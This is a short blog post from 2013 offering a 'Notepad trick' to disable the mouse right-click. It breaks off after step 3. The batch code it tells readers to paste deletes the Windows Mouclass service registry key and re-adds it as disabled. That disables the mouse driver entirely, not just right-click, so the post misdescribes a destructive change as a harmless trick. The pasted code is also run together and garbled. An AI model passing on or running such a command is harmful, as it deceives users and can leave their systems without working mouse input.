Trick to disable right click in mouse./Notepad tricks 2013
Sabtu, 30 Maret 2013
0
komentar

Hello Friends, Sharing with you all a new trick on Notepad where you can disable right click on mouse. just check out few simple steps shown below and try out...1. Open your Notepad.2. Copy and past below code in Notepad.remrem Disable Mouseset key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4rem 3. Save this file...
Baca Selengkapnya ....